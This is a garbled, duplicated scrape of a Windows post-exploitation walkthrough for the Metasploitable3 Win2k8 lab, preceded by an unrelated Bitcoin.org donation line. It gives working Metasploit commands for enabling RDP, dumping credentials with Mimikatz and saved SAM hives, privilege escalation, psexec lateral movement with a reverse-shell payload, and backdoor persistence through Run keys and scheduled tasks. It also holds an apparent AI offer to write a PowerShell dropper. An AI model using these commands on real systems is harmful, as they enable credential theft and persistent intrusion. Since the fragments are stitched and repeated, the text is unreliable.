Bitcoin.org is a community funded project, donations are appreciated and used to improve the website.
dir C:\flag*.txt dir C:\Users\*\Desktop\flag.txt dir C:\vagrant\ (if VM) Also:
shell C:\Windows\system32\reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f ^Z background sessions -u <session_id> sessions <new_session_id> sysinfo # OS build, hostname getuid # current user (probably SYSTEM) ipconfig /all # network layout route netstat -ano # listening ports + PID ps # running processes User info shell net users net localgroup administrators net group "Domain Admins" /domain # if domain-joined (likely not by default) wmic useraccount get name,sid 3. Dump Credentials a) Mimikatz (kiwi module) load kiwi creds_all lsa_dump_sam lsa_dump_secrets b) Registry SAM dump reg save hklm\sam c:\windows\temp\sam.save reg save hklm\system c:\windows\temp\system.save download c:\windows\temp\*.save /root/loot/ Then offline crack: metasploitable3-win2k8
use exploit/windows/local/ms15_051_client_copy_image set SESSION <id> run If you want, I can send a full scripted version of this process (as a .rc file + PowerShell dropper) for automated post‑ex against Metasploitable3‑Win2k8. dir C:\flag*
use exploit/windows/smb/psexec set RHOSTS <another_target_ip> set SMBUser hacker set SMBPass P@ssw0rd123! set payload windows/x64/meterpreter/reverse_tcp run a) Metasploit persistence run persistence -X -i 60 -p 443 -r <your_ip> b) Registry run key reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v updater -d 'C:\windows\temp\backdoor.exe' c) Scheduled task (every hour) schtasks /create /tn "SysUpdate" /tr "C:\windows\temp\backdoor.exe" /sc hourly /ru SYSTEM 6. Interesting Artifacts on Win2k8 (Metasploitable3 specific) Check for: sysinfo # OS build
dir C:\flag*.txt dir C:\Users\*\Desktop\flag.txt dir C:\vagrant\ (if VM) Also:
shell C:\Windows\system32\reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f ^Z background sessions -u <session_id> sessions <new_session_id> sysinfo # OS build, hostname getuid # current user (probably SYSTEM) ipconfig /all # network layout route netstat -ano # listening ports + PID ps # running processes User info shell net users net localgroup administrators net group "Domain Admins" /domain # if domain-joined (likely not by default) wmic useraccount get name,sid 3. Dump Credentials a) Mimikatz (kiwi module) load kiwi creds_all lsa_dump_sam lsa_dump_secrets b) Registry SAM dump reg save hklm\sam c:\windows\temp\sam.save reg save hklm\system c:\windows\temp\system.save download c:\windows\temp\*.save /root/loot/ Then offline crack:
use exploit/windows/local/ms15_051_client_copy_image set SESSION <id> run If you want, I can send a full scripted version of this process (as a .rc file + PowerShell dropper) for automated post‑ex against Metasploitable3‑Win2k8.
use exploit/windows/smb/psexec set RHOSTS <another_target_ip> set SMBUser hacker set SMBPass P@ssw0rd123! set payload windows/x64/meterpreter/reverse_tcp run a) Metasploit persistence run persistence -X -i 60 -p 443 -r <your_ip> b) Registry run key reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v updater -d 'C:\windows\temp\backdoor.exe' c) Scheduled task (every hour) schtasks /create /tn "SysUpdate" /tr "C:\windows\temp\backdoor.exe" /sc hourly /ru SYSTEM 6. Interesting Artifacts on Win2k8 (Metasploitable3 specific) Check for: